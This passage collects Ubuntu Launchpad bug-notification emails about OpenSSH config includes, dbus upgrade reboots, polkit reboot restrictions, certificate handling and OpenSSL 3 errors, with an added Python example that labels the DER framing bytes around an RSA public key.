[Touch-packages] [Bug 1885990] Re: server: Match has no effect in include file (upstream 3122)
I can't speak for the SRU team, but it's entirely possible that if you
prepare and test a debdiff, and show that this can be fixed, you could
drive an SRU through to completion; see
https://wiki.ubuntu.com/StableReleaseUpdates for more information.

Thanks

--
https://bugs.launchpad.net/bugs/1885990

Title:
  server: Match has no effect in include file (upstream 3122)

Status in portable OpenSSH:
  Unknown
Status in openssh package in Ubuntu:
  Fix Released

Bug description:
  Hello

  Ubuntu version: focal 20.04 LTS
  Version:
  openssh-server:
    Installed: 1:8.2p1-4ubuntu0.1
    Candidate: 1:8.2p1-4ubuntu0.1

  Expected: match statement in included files work as documented in the
  fine manual

  What happens: the statements are ignored.

  If you add Match statements in an included file, it will generate no
  error but have no effect. The exact same statements work in the main
  server config file (/etc/ssh/sshd_config)

  this is to track upstream bug 3122:
  https://bugzilla.mindrot.org/show_bug.cgi?id=3122

  it's fixed but will only be in 8.4 so it affects Ubuntu 20.04 LTS
  where openssh is at 8.2.

  I'm not *absolutely* whining for a backport since include files is a
  new feature for openssl in focal so it's not a regression. Would be
  nice though :), because include files are standard for any server
  software in Linux since at least a decade...
[Touch-packages] [Bug 1965857] Re: software-properties-gtk crashed with AttributeError in packages_for_modalias(): 'Cache' object has no attribute 'packages'
** Information type changed from Private Security to Public

--
https://bugs.launchpad.net/bugs/1965857

Title:
  software-properties-gtk crashed with AttributeError in
  packages_for_modalias(): 'Cache' object has no attribute 'packages'

Status in software-properties package in Ubuntu:
  New

Bug description:
  live patch not active

  ProblemType: Crash
  DistroRelease: Ubuntu 22.04
  Package: software-properties-gtk 0.99.19
  ProcVersionSignature: Ubuntu 5.15.0-23.23-generic 5.15.27
  Uname: Linux 5.15.0-23-generic x86_64
  ApportVersion: 2.20.11-0ubuntu79
  Architecture: amd64
  CasperMD5CheckResult: unknown
  CurrentDesktop: ubuntu:GNOME
  Date: Tue Mar 22 10:22:47 2022
  ExecutablePath: /usr/bin/software-properties-gtk
  InstallationDate: Installed on 2020-04-25 (695 days ago)
  InstallationMedia: Ubuntu 20.04 LTS "Focal Fossa" - Release amd64 (20200423)
  InterpreterPath: /usr/bin/python3.10
  PackageArchitecture: all
  ProcCmdline: /usr/bin/python3 /usr/bin/software-properties-gtk --open-tab=6
  ProcEnviron:
   LANGUAGE=en_IN:en
   PATH=(custom, user)
   XDG_RUNTIME_DIR=
   LANG=en_IN
   SHELL=/bin/bash
  Python3Details: /usr/bin/python3.10, Python 3.10.3, python3-minimal, 3.10.1-0ubuntu2
  PythonArgs: ['/usr/bin/software-properties-gtk', '--open-tab=6']
  PythonDetails: N/A
  SourcePackage: software-properties
  Title: software-properties-gtk crashed with AttributeError in packages_for_modalias(): 'Cache' object has no attribute 'packages'
  UpgradeStatus: Upgraded to jammy on 2022-02-12 (37 days ago)
  UserGroups: adm cdrom dip lpadmin lxd plugdev sambashare sudo
[Touch-packages] [Bug 1965661] Re: software-properties-gtk crashed with AttributeError in packages_for_modalias(): 'Cache' object has no attribute 'packages'
** Information type changed from Private Security to Public

--
https://bugs.launchpad.net/bugs/1965661

Title:
  software-properties-gtk crashed with AttributeError in
  packages_for_modalias(): 'Cache' object has no attribute 'packages'

Status in software-properties package in Ubuntu:
  New

Bug description:
  software-properties-gtk crashed with AttributeError in
  packages_for_modalias(): 'Cache' object has no attribute 'packages'

  ProblemType: Crash
  DistroRelease: Ubuntu 22.04
  Package: software-properties-gtk 0.99.19
  ProcVersionSignature: Ubuntu 5.15.0-23.23-generic 5.15.27
  Uname: Linux 5.15.0-23-generic x86_64
  NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair
  ApportVersion: 2.20.11-0ubuntu79
  Architecture: amd64
  CasperMD5CheckResult: pass
  CrashCounter: 1
  CurrentDesktop: ubuntu:GNOME
  Date: Sun Mar 20 03:33:53 2022
  ExecutablePath: /usr/bin/software-properties-gtk
  InstallationDate: Installed on 2022-03-20 (0 days ago)
  InstallationMedia: Ubuntu 22.04 LTS "Jammy Jellyfish" - Alpha amd64 (20220319)
  InterpreterPath: /usr/bin/python3.10
  PackageArchitecture: all
  ProcCmdline: /usr/bin/python3 /usr/bin/software-properties-gtk --open-tab 2
  ProcEnviron:
   PATH=(custom, no user)
   XDG_RUNTIME_DIR=
   LANG=en_US.UTF-8
   SHELL=/bin/bash
  Python3Details: /usr/bin/python3.10, Python 3.10.2+, python3-minimal, 3.10.1-0ubuntu2
  PythonArgs: ['/usr/bin/software-properties-gtk', '--open-tab', '2']
  PythonDetails: N/A
  SourcePackage: software-properties
  Title: software-properties-gtk crashed with AttributeError in packages_for_modalias(): 'Cache' object has no attribute 'packages'
  UpgradeStatus: No upgrade log present (probably fresh install)
  UserGroups: adm cdrom dip lpadmin lxd plugdev sambashare sudo
[Touch-packages] [Bug 1968047] Re: Ubuntu 22.04 Beta - Unable to compile ruby version 2.7.5, 3.0.3 and 3.3.3 problem with the openssl-dev package
Hopefully this is helpful for you:

https://sources.debian.org/data/main/r/ruby3.0/3.0.3-1/debian/patches/Update-openssl-to-version-3.0.0.patch

Thanks

--
https://bugs.launchpad.net/bugs/1968047

Title:
  Ubuntu 22.04 Beta - Unable to compile ruby version 2.7.5, 3.0.3 and
  3.3.3 problem with the openssl-dev package

Status in openssl package in Ubuntu:
  New

Bug description:
  This problem only exists in Ubuntu 22.04 beta

  When attempting to compile ruby (any version - I have tried 2.7.5,
  3.0.3 & 3.1.1) it fails because of a problem with the libssl-dev
  package. The previous version of Ubuntu used version 1.1.1. The new
  version uses openssl-dev/libssl-dev 3.0.2

  $ lsb_release -rd
  Description:    Ubuntu Jammy Jellyfish (development branch)
  Release:        22.04

  sudo apt-cache policy libssl-dev
  libssl-dev:
    Installed: 3.0.2-0ubuntu1
    Candidate: 3.0.2-0ubuntu1
    Version table:
   *** 3.0.2-0ubuntu1 500
          500 http://au.archive.ubuntu.com/ubuntu jammy/main amd64 Packages
          100 /var/lib/dpkg/status
[Touch-packages] [Bug 1968305] Re: sshd_config.d overrides not working
This reminds me of several previous bugs; this may or may not be a duplicate, and this may or may not be intentional behaviour. Hopefully these are useful and save some debugging effort: https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1922212 https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1876320 https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1873528 Especially 1873528 feels like most likely to be relevant, I suggest reading that one first. Thanks -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to openssh in Ubuntu. https://bugs.launchpad.net/bugs/1968305 Title: sshd_config.d overrides not working Status in openssh package in Ubuntu: New Bug description: Creating an sshd_config override file under /etc/ssh/sshd_config.d/ does not override settings from /etc/ssh/sshd_config From debugging sshd, I can see the override file is indeed being read, and the option is supposedly set. But after testing, the options are not taking effect. Specifically, in the main sshd_config, I have disabled PasswordAuthentication In my override file, PasswordAuthentication is enabled Yet, when connecting to the server, it only checks public/private keys. This is for an environment where we have our default sshd_config, and in specific use-cases, we might enable PasswordAuthentication for some servers. 
ProblemType: Bug DistroRelease: Ubuntu 20.04 Package: openssh-server 1:8.2p1-4ubuntu0.4 ProcVersionSignature: Ubuntu 5.13.0-39.44~20.04.1-generic 5.13.19 Uname: Linux 5.13.0-39-generic x86_64 ApportVersion: 2.20.11-0ubuntu27.21 Architecture: amd64 CasperMD5CheckResult: pass Date: Fri Apr 8 10:37:42 2022 InstallationDate: Installed on 2021-11-04 (154 days ago) InstallationMedia: Ubuntu-Server 20.04.3 LTS "Focal Fossa" - Release amd64 (20210824) SourcePackage: openssh UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1968305/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1968845] Re: Upgrade to 22.04 from 20.04 ends with dbus installation asking for a reboot
Yikes, does it actually *stop* at that point? That's .. not ideal. Thanks -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to dbus in Ubuntu. https://bugs.launchpad.net/bugs/1968845 Title: Upgrade to 22.04 from 20.04 ends with dbus installation asking for a reboot Status in dbus package in Ubuntu: New Bug description: Upgrading on a virtual machine from 20.04 to 22.04. I have had this happen twice now, I got one upgrade done without this bug. Basically the package installation stops at dbus package asking for a reboot as it was unable to upgrade as dbus-daemon was running. And rebooting at this stage obviously will cause a non-functioning system. Added a screenshot of the upgrade window. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/dbus/+bug/1968845/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1968845] Re: Upgrade to 22.04 from 20.04 ends with dbus installation asking for a reboot
Here's the postinst I've got for that package. Maybe the reload_dbus_config() could use a --reply-timeout=5000 or something? Thanks

```
$ cat /fst/trees/ubuntu/main/d/dbus/dbus_1.12.20-2ubuntu4/debian/dbus.postinst
#!/bin/sh
# Copyright © 2003 Colin Walters
# Copyright © 2006 Sjoerd Simons

set -e

MESSAGEUSER=messagebus
MESSAGEHOME=/var/run/dbus
LAUNCHER=/usr/lib/dbus-1.0/dbus-daemon-launch-helper

# This is what the init script would do, but it's simpler (and less
# dependent on sysvinit vs. Upstart vs. etc.) if we do it directly.
reload_dbus_config() {
    [ -S /var/run/dbus/system_bus_socket ] || return 0

    dbus-send --print-reply --system --type=method_call \
        --dest=org.freedesktop.DBus \
        / org.freedesktop.DBus.ReloadConfig > /dev/null || true
}

if [ "$1" = triggered ]; then
    reload_dbus_config
    exit 0
fi

if [ "$1" = configure ]; then
    adduser --system \
        --quiet \
        --home /nonexistent \
        --no-create-home \
        --disabled-password \
        --group "$MESSAGEUSER"

    if ! dpkg-statoverride --list "$LAUNCHER" >/dev/null; then
        dpkg-statoverride --update --add root "$MESSAGEUSER" 4754 "$LAUNCHER"
    fi

    # This is idempotent, so it's OK to do every time. The system bus' init
    # script does this anyway, but you also have to do this before a session
    # bus will work, so we do this here for the benefit of people starting
    # a temporary session bus in a chroot
    dbus-uuidgen --ensure
fi

if [ "$1" = configure ] && [ -n "$2" ]; then
    # On upgrades, we only reload config, and don't restart (restarting the
    # system bus is not supported by upstream). The code added by
    # dh_installinit -r creates a start action, below.

    # Recommend a reboot if there is a dbus-daemon running in the same root
    # as us. Deliberately not using anything init-related here, to be
    # init-agnostic: if we get a false positive (at least one dbus-daemon
    # is running but it isn't the system bus) that isn't the end of the
    # world, because it's probably a session bus, so the user needs to
    # log out and back in anyway.
    #
    # Debian has /usr/bin/dbus-daemon, Ubuntu has /bin/dbus-daemon.
    # Look for both.
    if pidof -c /bin/dbus-daemon /usr/bin/dbus-daemon >/dev/null; then
        echo "A reboot is required to replace the running dbus-daemon." >&2
        echo "Please reboot the system when convenient." >&2

        # trigger an update notification that recommends a reboot
        # (used by unattended-upgrades etc.)
        touch /var/run/reboot-required || true

        if ! grep -Fqsx dbus /run/reboot-required.pkgs; then
            echo dbus >> /run/reboot-required.pkgs || true
        fi

        # same thing for the older update-notifier interface
        [ -x /usr/share/update-notifier/notify-reboot-required ] && \
            /usr/share/update-notifier/notify-reboot-required || true
    fi

    # Clean up old compatibility symlinks that were used to upgrade from
    # Debian 8 to Debian 9. This can be dropped after Debian 10 is released.
    for bus in system session; do
        conf="/etc/dbus-1/${bus}.conf"
        exp_target="/usr/share/dbus-1/${bus}.conf"
        target="$(readlink -f "${conf}")" || continue

        if [ -h "${conf}" ] && [ "_${target}" = "_${exp_target}" ]; then
            rm -f "${conf}"
        fi
    done
fi

#DEBHELPER#

# Do this after the debhelper-generated bits so that dpkg-maintscript-helper
# will have finished moving configuration files around. We only need to do
# this for upgrades, not new installations.
if [ "$1" = configure ] && [ -n "$2" ]; then
    reload_dbus_config
fi

# We don't start dbus.service in postinst, so ensure dbus.socket is running
if [ "$1" = configure ] && [ -d /run/systemd/system ]; then
    systemctl try-restart sockets.target || true
fi
```

-- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to dbus in Ubuntu. https://bugs.launchpad.net/bugs/1968845 Title: Upgrade to 22.04 from 20.04 ends with dbus installation asking for a reboot Status in dbus package in Ubuntu: New Bug description: Upgrading on a virtual machine from 20.04 to 22.04. I have had this happen twice now, I got one upgrade done without this bug. Basically the package installation stops at dbus package asking for a reboot as it was unable to upgrade as dbus-daemon was running. And rebooting at this stage obviously will cause a non-functioning system. Added a screenshot of the upgrade window. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/dbus/+bug/1968845/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1969118] Re: Certificate viewer shows extra bytes for RSA keys
Hello Mikko, thanks for the report; I believe that's working as intended, those bytes are part of the DER encoding; there's an excellent answer at https://crypto.stackexchange.com/a/19982/1400 that describes the meanings of each of those bytes. Thanks ** Information type changed from Private Security to Public Security ** Changed in: gcr (Ubuntu) Status: New => Invalid -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to gcr in Ubuntu. https://bugs.launchpad.net/bugs/1969118 Title: Certificate viewer shows extra bytes for RSA keys Status in gcr package in Ubuntu: Invalid Bug description: When I view a x509 certificate using gcr-viewer .../path/to/certificate.pem and open the "Details" section and check the RSA public key information, the section that lists the public key renders extra 8 bytes at the start and 5 bytes at the end which are not actually part of the key. I haven't tried if this happens with other file types except x509, or with encryption methods except RSA. The exact certificate I viewed can be downloaded from https://crt.sh/?d=6454583403 and the expected public key modulus should start with 00:b6:28:0b:44:... but the certificate viewer shows public key starting with bytes 30 82 01 0A 02 82 01 01 00 B6 28 0B 44. Note the extra bytes 30 82 01 0A 02 82 01 01. The extra bytes seem to be static and do not change after re-launching the viewer again. There are also extra bytes in the end of the displayed key. I'm marking this bug as a security vulnerability for now because (1) This tool is supposed to be used to check encryption credentials, and (2) It's still unknown if this is some kind of 8 byte underflow/5 byte overflow or just a rendering problem. I'm not aware of the viewer writing extra bytes to any memory location so I would assume this is just a rendering issue. I'm fine with this issue being public so feel free to publish at your discretion. 
ProblemType: Bug DistroRelease: Ubuntu 18.04 Package: gcr 3.28.0-1 ProcVersionSignature: Ubuntu 5.4.0-107.121~18.04.1-lowlatency 5.4.174 Uname: Linux 5.4.0-107-lowlatency x86_64 ApportVersion: 2.20.9-0ubuntu7.27 Architecture: amd64 CurrentDesktop: MATE Date: Thu Apr 14 15:47:18 2022 EcryptfsInUse: Yes InstallationDate: Installed on 2019-01-05 (1194 days ago) InstallationMedia: Ubuntu 18.04.1 LTS "Bionic Beaver" - Release amd64 (20180725) SourcePackage: gcr UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/gcr/+bug/1969118/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
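The DER framing mentioned in the reply above, as an added example that is not part of the original thread or of gcr: it encodes and then parses a PKCS#1 RSAPublicKey whose modulus begins with the B6 28 0B 44 bytes quoted in the report, and labels the bytes around it. The rest of the modulus is constructed filler, and the exponent 65537 is an assumption, since the report does not list the trailing bytes.

```python
"""Label the DER framing around an RSA public key (PKCS#1 RSAPublicKey)."""

SEQUENCE, INTEGER = 0x30, 0x02


def der_tlv(tag, value):
    """Encode one tag-length-value element using DER definite lengths."""
    n = len(value)
    if n < 0x80:
        length = bytes([n])                      # short form: one byte
    else:
        raw = n.to_bytes((n.bit_length() + 7) // 8, "big")
        length = bytes([0x80 | len(raw)]) + raw  # long form: 0x8N + N bytes
    return bytes([tag]) + length + value


def der_integer(x):
    """Encode a non-negative INTEGER; a 0x00 pad keeps the sign bit clear."""
    if x < 0:
        raise ValueError("only non-negative integers are supported here")
    return der_tlv(INTEGER, x.to_bytes(x.bit_length() // 8 + 1, "big"))


def read_tlv(buf, pos):
    """Return (tag, header, value, next_pos) for the element at buf[pos]."""
    if pos + 2 > len(buf):
        raise ValueError("truncated TLV header")
    tag, first = buf[pos], buf[pos + 1]
    start = pos + 2
    if first < 0x80:
        length = first
    else:
        count = first & 0x7F
        if count == 0 or start + count > len(buf):
            raise ValueError("indefinite or truncated length")
        length = int.from_bytes(buf[start:start + count], "big")
        start += count
    end = start + length
    if end > len(buf):
        raise ValueError("value runs past end of buffer")
    return tag, buf[pos:start], buf[start:end], end


def parse_rsa_public_key(der):
    """Split RSAPublicKey ::= SEQUENCE { modulus INTEGER, exponent INTEGER }."""
    tag, seq_hdr, body, end = read_tlv(der, 0)
    if tag != SEQUENCE or end != len(der):
        raise ValueError("not a single DER SEQUENCE")
    tag, n_hdr, n_val, pos = read_tlv(body, 0)
    if tag != INTEGER or not n_val or n_val[0] & 0x80:
        raise ValueError("modulus is not a positive INTEGER")
    tag, e_hdr, e_val, pos = read_tlv(body, pos)
    if tag != INTEGER or pos != len(body):
        raise ValueError("expected exactly two INTEGERs")
    return {
        "framing_before_modulus": seq_hdr + n_hdr,  # SEQUENCE + INTEGER headers
        "modulus_value_bytes": n_val,               # includes the 0x00 sign pad
        "modulus": int.from_bytes(n_val, "big"),
        "exponent_tlv": e_hdr + e_val,              # header and value together
        "exponent": int.from_bytes(e_val, "big"),
    }


def build_sample_key():
    """Constructed 2048-bit key: the report's first 4 modulus bytes plus filler."""
    modulus = int.from_bytes(bytes.fromhex("b6280b44") + bytes(range(252)), "big")
    exponent = 65537  # assumption: the report does not give the exponent
    return der_tlv(SEQUENCE, der_integer(modulus) + der_integer(exponent))


def describe(der):
    """Return one human-readable line per byte group of the encoded key."""
    key = parse_rsa_public_key(der)
    return [
        "framing : " + key["framing_before_modulus"].hex(" "),
        "modulus : %d bits, value bytes start %s" % (
            key["modulus"].bit_length(), key["modulus_value_bytes"][:5].hex(" ")),
        "exponent: " + key["exponent_tlv"].hex(" ") + " (e=%d)" % key["exponent"],
    ]


if __name__ == "__main__":
    for line in describe(build_sample_key()):
        print(line)
```

A viewer that prints the whole encoded structure shows the two headers before the modulus and the exponent element after it; none of those bytes belong to the modulus.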
[Touch-packages] [Bug 1968845] Re: Upgrade to 22.04 from 20.04 ends with dbus installation asking for a reboot
This may be a duplicate of https://launchpad.net/bugs/1969162 -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to dbus in Ubuntu. https://bugs.launchpad.net/bugs/1968845 Title: Upgrade to 22.04 from 20.04 ends with dbus installation asking for a reboot Status in dbus package in Ubuntu: New Bug description: Upgrading on a virtual machine from 20.04 to 22.04. I have had this happen twice now, I got one upgrade done without this bug. Basically the package installation stops at dbus package asking for a reboot as it was unable to upgrade as dbus-daemon was running. And rebooting at this stage obviously will cause a non-functioning system. Added a screenshot of the upgrade window. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/dbus/+bug/1968845/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1969593] Re: rules to prevent non-root users from rebooting not taken into account
** Information type changed from Private Security to Public Security -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to policykit-1 in Ubuntu. https://bugs.launchpad.net/bugs/1969593 Title: rules to prevent non-root users from rebooting not taken into account Status in policykit-1 package in Ubuntu: New Bug description: On fresh Ubuntu Jammy installation, I add a "/etc/polkit-1/localauthority/90-mandatory.d/restriction.pkla" file with the following contents :

```
[Disable power-off]
Identity=unix-user:*
Action=org.freedesktop.login1.power-off
ResultActive=no
ResultInactive=no
ResultAny=no

[Disable power-off when others are logged in]
Identity=unix-user:*
Action=org.freedesktop.login1.power-off-multiple-sessions
ResultActive=no
ResultInactive=no
ResultAny=no

[Disable_reboot]
Identity=unix-user:*
Action=org.freedesktop.login1.reboot
ResultActive=no
ResultInactive=no
ResultAny=no

[Disable_reboot_when_others_are_logged_in]
Identity=unix-user:*
Action=org.freedesktop.login1.reboot-multiple-sessions
ResultActive=no
ResultInactive=no
ResultAny=no
```

It must prevent non-root users from shutting down and rebooting the system. But it only prevents shutting down. Rebooting is still possible for a non-root user. We can see it using pkcheck command (as a non-root user) :

```
$ pkcheck --action-id org.freedesktop.login1.power-off --process $PPID ; echo $?
Not authorized.
1
$ pkcheck --action-id org.freedesktop.login1.reboot --process $PPID ; echo $?
0
```

As this problem can lead to unexpected reboot on multi-user systems (an availability concern), I checked the "This bug is a security vulnerability" box.
ProblemType: Bug DistroRelease: Ubuntu 22.04 Package: policykit-1 0.105-33 ProcVersionSignature: Ubuntu 5.15.0-25.25-generic 5.15.30 Uname: Linux 5.15.0-25-generic x86_64 ApportVersion: 2.20.11-0ubuntu82 Architecture: amd64 CasperMD5CheckResult: pass CurrentDesktop: ubuntu:GNOME Date: Wed Apr 20 10:53:27 2022 InstallationDate: Installed on 2022-04-20 (0 days ago) InstallationMedia: Ubuntu 22.04 LTS "Jammy Jellyfish" - Release amd64 (20220419) ProcEnviron: TERM=xterm-256color PATH=(custom, no username) XDG_RUNTIME_DIR= LANG=fr_FR.UTF-8 SHELL=/bin/bash SourcePackage: policykit-1 UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/policykit-1/+bug/1969593/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1969593] Re: rules to prevent non-root users from rebooting not taken into account
** Also affects: systemd (Ubuntu) Importance: Undecided Status: New -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to systemd in Ubuntu. https://bugs.launchpad.net/bugs/1969593 Title: rules to prevent non-root users from rebooting not taken into account Status in policykit-1 package in Ubuntu: New Status in systemd package in Ubuntu: New Bug description: On fresh Ubuntu Jammy installation, I add a "/etc/polkit-1/localauthority/90-mandatory.d/restriction.pkla" file with the following contents :

```
[Disable power-off]
Identity=unix-user:*
Action=org.freedesktop.login1.power-off
ResultActive=no
ResultInactive=no
ResultAny=no

[Disable power-off when others are logged in]
Identity=unix-user:*
Action=org.freedesktop.login1.power-off-multiple-sessions
ResultActive=no
ResultInactive=no
ResultAny=no

[Disable_reboot]
Identity=unix-user:*
Action=org.freedesktop.login1.reboot
ResultActive=no
ResultInactive=no
ResultAny=no

[Disable_reboot_when_others_are_logged_in]
Identity=unix-user:*
Action=org.freedesktop.login1.reboot-multiple-sessions
ResultActive=no
ResultInactive=no
ResultAny=no
```

It must prevent non-root users from shutting down and rebooting the system. But it only prevents shutting down. Rebooting is still possible for a non-root user. We can see it using pkcheck command (as a non-root user) :

```
$ pkcheck --action-id org.freedesktop.login1.power-off --process $PPID ; echo $?
Not authorized.
1
$ pkcheck --action-id org.freedesktop.login1.reboot --process $PPID ; echo $?
0
```

As this problem can lead to unexpected reboot on multi-user systems (an availability concern), I checked the "This bug is a security vulnerability" box.
ProblemType: Bug DistroRelease: Ubuntu 22.04 Package: policykit-1 0.105-33 ProcVersionSignature: Ubuntu 5.15.0-25.25-generic 5.15.30 Uname: Linux 5.15.0-25-generic x86_64 ApportVersion: 2.20.11-0ubuntu82 Architecture: amd64 CasperMD5CheckResult: pass CurrentDesktop: ubuntu:GNOME Date: Wed Apr 20 10:53:27 2022 InstallationDate: Installed on 2022-04-20 (0 days ago) InstallationMedia: Ubuntu 22.04 LTS "Jammy Jellyfish" - Release amd64 (20220419) ProcEnviron: TERM=xterm-256color PATH=(custom, no username) XDG_RUNTIME_DIR= LANG=fr_FR.UTF-8 SHELL=/bin/bash SourcePackage: policykit-1 UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/policykit-1/+bug/1969593/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1970459] Re: import of ca-certificate in browser does not work
I switched this from ca-certificates to firefox and chromium-browser, since both browsers manage their own certificate lists and don't use the system-provided ca-certificates. (You manage that with different tools, see the first few lines of /etc/ca-certificates.conf for details.) Thanks ** Package changed: ca-certificates (Ubuntu) => firefox (Ubuntu) ** Also affects: chromium-browser (Ubuntu) Importance: Undecided Status: New -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to ca-certificates in Ubuntu. https://bugs.launchpad.net/bugs/1970459 Title: import of ca-certificate in browser does not work Status in chromium-browser package in Ubuntu: New Status in firefox package in Ubuntu: New Bug description: I tried to import a CA root certificate into both Firefox and Chrome. In Firefox, the import button just didn't do anything, in Chrome pressing "import" hangs up the browser. This means I can't reach the intranet of the company I work for. ProblemType: Bug DistroRelease: Ubuntu 22.04 Package: ca-certificates 20211016 ProcVersionSignature: Ubuntu 5.15.0-27.28-generic 5.15.30 Uname: Linux 5.15.0-27-generic x86_64 NonfreeKernelModules: nvidia_modeset nvidia ApportVersion: 2.20.11-0ubuntu82 Architecture: amd64 CasperMD5CheckResult: pass CurrentDesktop: ubuntu:GNOME Date: Tue Apr 26 19:16:12 2022 InstallationDate: Installed on 2022-04-23 (3 days ago) InstallationMedia: Ubuntu 22.04 LTS "Jammy Jellyfish" - Release amd64 (20220419) PackageArchitecture: all SourcePackage: ca-certificates UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/chromium-browser/+bug/1970459/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1963834] Re: openssl 3.0 - SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED]
Yes, managing the configurations for the huge variety of cryptography toolkits on a Linux system is definitely something of a chore. It would be nice to give people one command they could use to return to unsafe-but-compatible cryptography -- or enforce only modern cryptography. Our friends at Red Hat have prepared https://gitlab.com/redhat-crypto/fedora-crypto-policies -- while a version of this is packaged: https://launchpad.net/ubuntu/+source/crypto-policies -- I don't believe it actually works on Ubuntu: https://bugs.launchpad.net/ubuntu/+source/crypto-policies/+bug/1926664 Maybe someday. Thanks -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to openssl in Ubuntu. https://bugs.launchpad.net/bugs/1963834 Title: openssl 3.0 - SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED] Status in openssl package in Ubuntu: Won't Fix Bug description: Description:Ubuntu Jammy Jellyfish (development branch) Release:22.04 openssl: Installé : 3.0.1-0ubuntu1 Candidat : 3.0.1-0ubuntu1 Table de version : *** 3.0.1-0ubuntu1 500 500 http://ca.archive.ubuntu.com/ubuntu jammy/main amd64 Packages 100 /var/lib/dpkg/status Using Ubuntu 22.04, I now get the following error message when attempting to connect to our office VPN using "gp-saml-gui (https://github.com/dlenski/gp-saml-gui)" : # dominique@Doombuntu:~$ .local/bin/gp-saml-gui server_url Looking for SAML auth tags in response to https://server_url/global-protect/prelogin.esp... usage: gp-saml-gui [-h] [--no-verify] [-C COOKIES | -K] [-g | -p] [-c CERT] [--key KEY] [-v | -q] [-x | -P | -S] [-u] [--clientos {Windows,Linux,Mac}] [-f EXTRA] server [openconnect_extra ...] gp-saml-gui: error: SSL error: [SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED] unsafe legacy renegotiation disabled (_ssl.c:997) # # # gp-saml-gui uses python module requests. 
Using python ide, I can get the same results : # >>> r = requests.get('https://server_url') Traceback (most recent call last): File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 699, in urlopen httplib_response = self._make_request( File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 382, in _make_request self._validate_conn(conn) File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 1012, in _validate_conn conn.connect() File "/usr/lib/python3/dist-packages/urllib3/connection.py", line 411, in connect self.sock = ssl_wrap_socket( File "/usr/lib/python3/dist-packages/urllib3/util/ssl_.py", line 449, in ssl_wrap_socket ssl_sock = _ssl_wrap_socket_impl( File "/usr/lib/python3/dist-packages/urllib3/util/ssl_.py", line 493, in _ssl_wrap_socket_impl return ssl_context.wrap_socket(sock, server_hostname=server_hostname) File "/usr/lib/python3.10/ssl.py", line 512, in wrap_socket return self.sslsocket_class._create( File "/usr/lib/python3.10/ssl.py", line 1070, in _create self.do_handshake() File "/usr/lib/python3.10/ssl.py", line 1341, in do_handshake self._sslobj.do_handshake() ssl.SSLError: [SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED] unsafe legacy renegotiation disabled (_ssl.c:997) During handling of the above exception, another exception occurred: Traceback (most recent call last): File "/usr/lib/python3/dist-packages/requests/adapters.py", line 439, in send resp = conn.urlopen( File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 755, in urlopen retries = retries.increment( File "/usr/lib/python3/dist-packages/urllib3/util/retry.py", line 574, in increment raise MaxRetryError(_pool, url, error or ResponseError(cause)) urllib3.exceptions.MaxRetryError: HTTPSConnectionPool(host='server_url', port=443): Max retries exceeded with url: / (Caused by SSLError(SSLError(1, '[SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED] unsafe legacy renegotiation disabled (_ssl.c:997)'))) During handling of the above 
